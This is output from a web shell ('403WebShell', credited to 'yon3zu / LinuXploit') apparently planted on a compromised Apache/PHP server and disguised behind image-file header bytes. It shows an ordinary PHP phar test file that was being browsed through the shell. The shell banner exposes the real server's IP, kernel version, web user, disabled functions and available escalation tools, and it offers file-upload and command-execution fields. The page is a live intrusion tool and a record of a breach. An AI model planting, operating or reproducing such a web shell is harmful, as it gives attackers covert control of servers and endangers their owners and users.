????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.238
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/phar/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/phar/tests/phar_buildfromiterator10.phpt
--TEST--
Phar::buildFromIterator() RegexIterator(RecursiveIteratorIterator), SplFileInfo as current
--SKIPIF--
<?php
if (!extension_loaded("phar")) die("skip");
?>
--INI--
phar.require_hash=0
phar.readonly=0
--FILE--
<?php
try {
	chdir(dirname(__FILE__));
	$phar = new Phar(dirname(__FILE__) . '/buildfromiterator10.phar');
	$dir = new RecursiveDirectoryIterator('.');
	$iter = new RecursiveIteratorIterator($dir);
	$a = $phar->buildFromIterator(new RegexIterator($iter, '/_\d{3}\.phpt$/'), dirname(__FILE__) . DIRECTORY_SEPARATOR);
	asort($a);
	var_dump($a);
} catch (Exception $e) {
	var_dump(get_class($e));
	echo $e->getMessage() . "\n";
}
?>
===DONE===
--CLEAN--
<?php 
unlink(dirname(__FILE__) . '/buildfromiterator10.phar');
__HALT_COMPILER();
?>
--EXPECTF--
array(35) {
  ["phar_ctx_001.phpt"]=>
  string(%d) "%sphar_ctx_001.phpt"
  ["phar_get_supported_signatures_001.phpt"]=>
  string(%d) "%sphar_get_supported_signatures_001.phpt"
  ["phar_get_supported_signatures_002.phpt"]=>
  string(%d) "%sphar_get_supported_signatures_002.phpt"
  ["phar_oo_001.phpt"]=>
  string(%d) "%sphar_oo_001.phpt"
  ["phar_oo_002.phpt"]=>
  string(%d) "%sphar_oo_002.phpt"
  ["phar_oo_003.phpt"]=>
  string(%d) "%sphar_oo_003.phpt"
  ["phar_oo_004.phpt"]=>
  string(%d) "%sphar_oo_004.phpt"
  ["phar_oo_005.phpt"]=>
  string(%d) "%sphar_oo_005.phpt"
  ["phar_oo_006.phpt"]=>
  string(%d) "%sphar_oo_006.phpt"
  ["phar_oo_007.phpt"]=>
  string(%d) "%sphar_oo_007.phpt"
  ["phar_oo_008.phpt"]=>
  string(%d) "%sphar_oo_008.phpt"
  ["phar_oo_009.phpt"]=>
  string(%d) "%sphar_oo_009.phpt"
  ["phar_oo_010.phpt"]=>
  string(%d) "%sphar_oo_010.phpt"
  ["phar_oo_011.phpt"]=>
  string(%d) "%sphar_oo_011.phpt"
  ["phar_oo_012.phpt"]=>
  string(%d) "%sphar_oo_012.phpt"
  ["phar_oo_compressed_001.phpt"]=>
  string(%d) "%sphar_oo_compressed_001.phpt"
  ["phar_oo_compressed_002.phpt"]=>
  string(%d) "%sphar_oo_compressed_002.phpt"
  ["phpinfo_001.phpt"]=>
  string(%d) "%sphpinfo_001.phpt"
  ["phpinfo_002.phpt"]=>
  string(%d) "%sphpinfo_002.phpt"
  ["phpinfo_003.phpt"]=>
  string(%d) "%sphpinfo_003.phpt"
  ["phpinfo_004.phpt"]=>
  string(%d) "%sphpinfo_004.phpt"
  ["tar/tar_001.phpt"]=>
  string(%d) "%star%ctar_001.phpt"
  ["tar/tar_002.phpt"]=>
  string(%d) "%star%ctar_002.phpt"
  ["tar/tar_003.phpt"]=>
  string(%d) "%star%ctar_003.phpt"
  ["tar/tar_004.phpt"]=>
  string(%d) "%star%ctar_004.phpt"
  ["zip/corrupt_001.phpt"]=>
  string(%d) "%szip%ccorrupt_001.phpt"
  ["zip/corrupt_002.phpt"]=>
  string(%d) "%szip%ccorrupt_002.phpt"
  ["zip/corrupt_003.phpt"]=>
  string(%d) "%szip%ccorrupt_003.phpt"
  ["zip/corrupt_004.phpt"]=>
  string(%d) "%szip%ccorrupt_004.phpt"
  ["zip/corrupt_005.phpt"]=>
  string(%d) "%szip%ccorrupt_005.phpt"
  ["zip/corrupt_006.phpt"]=>
  string(%d) "%szip%ccorrupt_006.phpt"
  ["zip/corrupt_007.phpt"]=>
  string(%d) "%szip%ccorrupt_007.phpt"
  ["zip/corrupt_008.phpt"]=>
  string(%d) "%szip%ccorrupt_008.phpt"
  ["zip/corrupt_009.phpt"]=>
  string(%d) "%szip%ccorrupt_009.phpt"
  ["zip/corrupt_010.phpt"]=>
  string(%d) "%szip%ccorrupt_010.phpt"
}
===DONE===

Youez - 2016 - github.com/yon3zu
LinuXploit